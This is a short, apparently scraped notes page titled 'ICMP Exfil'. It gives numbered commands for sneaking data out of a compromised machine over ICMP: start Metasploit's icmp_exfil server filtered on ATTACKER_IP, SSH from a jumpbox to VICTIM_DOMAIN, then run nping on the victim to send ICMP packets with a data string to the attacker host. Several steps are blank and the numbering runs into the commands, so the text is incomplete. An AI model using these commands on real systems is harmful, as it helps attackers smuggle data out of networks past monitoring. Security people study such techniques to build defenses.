ICMP Exfil
Commands:
1) Attacker:
msfconsole2)
use auxiliary/server/icmp_exfil3)
set BPF_FILTER icmp and not src ATTACKER_IP4)
set INTERFACE OUR_INTERFACE5)
run6) Jumpbox:
ssh USER@VICTIM_DOMAIN7) Victim:
sudo nping --icmp -c 1 ATTACK_IP --data-string8) Victim:
9)
10) Attacker:
Last updated